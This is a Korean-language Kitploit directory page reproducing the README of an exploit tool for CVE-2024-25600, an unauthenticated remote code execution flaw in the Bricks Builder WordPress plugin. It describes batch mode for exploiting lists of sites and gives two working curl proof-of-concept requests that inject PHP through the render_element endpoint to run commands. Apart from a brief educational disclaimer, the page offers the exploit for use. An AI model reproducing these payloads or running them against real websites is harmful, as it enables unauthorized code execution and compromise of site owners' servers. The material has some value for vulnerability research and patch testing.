Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-25600-Bricks-Builder-plugin-for-WordPress — 이 도구는 WordPress용 Bricks Builder 플러그인에서 발견된 CVE-2024-25600 취약점을 악용하도록 설계되었습니다. 이 취약점은 영향을 받는 웹사이트에서 인증되지 않은 원격 코드 실행을 허용합니다. 이 도구는 nonce를 검색하고 특수하게 제작된 요청을 전송하여 임의의 명령을 실행함으로써 악용 프로세스를 자동화합니다. | Kitploit
도구/GitHubGitHub/tornad0007/cve-2024-25600-bricks-builder-plugin-for-wordpress
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and Control
GitHubtornad0007/cve-2024-25600-bricks-builder-plugin-for-wordpress

CVE-2024-25600-Bricks-Builder-plugin-for-WordPress

이 도구는 WordPress용 Bricks Builder 플러그인에서 발견된 CVE-2024-25600 취약점을 악용하도록 설계되었습니다. 이 취약점은 영향을 받는 웹사이트에서 인증되지 않은 원격 코드 실행을 허용합니다. 이 도구는 nonce를 검색하고 특수하게 제작된 요청을 전송하여 임의의 명령을 실행함으로써 악용 프로세스를 자동화합니다.

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
912년 전아직 검토되지 않음

CVE-2024-25600 익스플로잇 도구 🚀

설명 📝

이 도구 🛠️는 WordPress용 Bricks Builder 플러그인에서 발견된 CVE-2024-25600 취약점 🕳️을 악용하도록 설계되었습니다. 이 취약점은 영향을 받는 웹사이트 💻에서 인증되지 않은 원격 코드 실행을 허용합니다. 이 도구는 nonce를 검색하고 특수하게 조작된 요청을 보내 임의의 명령을 실행함으로써 악용 프로세스를 자동화합니다.

기능 🌟

  • 대화형 모드: 대상 웹사이트와 실시간으로 상호 작용 🕹️.
  • 일괄 모드: 목록에서 여러 웹사이트를 스캔하고 악용 📋.
  • 명령 실행: 대상 서버에서 임의의 명령 실행 ⚙️.

설치 🛠️

  1. git clone을 사용하여 이 저장소를 로컬 머신 🖥️에 복제합니다.
  2. 복제된 저장소의 디렉터리로 이동합니다.
  3. pip install -r requirements.txt를 사용하여 필요한 Python 라이브러리를 설치합니다.

사용법 📖

대화형 모드 🎮

  1. python exploit.py -u <URL>로 도구를 실행하여 대화형 모드를 시작합니다.
  2. 화면의 안내에 따라 대상 서버에 명령을 보냅니다.

일괄 모드 📊

  1. 대상 URL 목록이 포함된 텍스트 파일을 준비합니다.
  2. python exploit.py -l <file_path>로 도구를 실행하여 나열된 사이트를 스캔하고 악용합니다.

개념 증명(PoC) 📝

공개 내용에서 제공된 기본 PoC는 다음과 같습니다:

root@kitploit:~
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
  "postId": "1",
  "nonce": "[NONCE]",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "throw new Exception(`id`);",
        "objectType": "post"
      }
    }
  }
}'

업데이트: 두 번째 PoC(더 안정적)

root@kitploit:~
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
  -H "Content-Type: application/json" \
  -d '{
  "postId": "1",
  "nonce": "[NONCE]",
  "element": {
    "name": "carousel",
    "settings": {
      "type": "posts",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "throw new Exception(`id`);",
        "objectType": "post"
      }
    }
  }
}'

추가 페이로드가 더 나은 결과를 낼 가능성이 있습니다. 제 익스플로잇이나 개념 증명이 효과가 없다면, 더 효과적인 해결책을 찾기 위해 대체 페이로드를 실험해 보시기 바랍니다.

[HOST]를 대상 웹사이트로, [NONCE]를 사이트에서 검색한 nonce 값으로 바꾸십시오.

참고 자료 📖

CVE-2024-25600 취약점에 대한 자세한 내용은 Snicco.io의 상세 공개 내용을 참조하십시오.

면책 조항 ⚠️

이 README에 제공된 정보는 교육 목적으로만 제공됩니다. 웹사이트나 네트워크에 대한 무단 해킹은 불법이며 비윤리적입니다. 🚫

감사의 말 🙏

이 취약점을 발견하고 보고하여 커뮤니티에 웹 애플리케이션을 보호하는 데 도움이 되는 정보와 도구를 제공한 보안 연구원들에게 감사를 표합니다.

도구 다운로드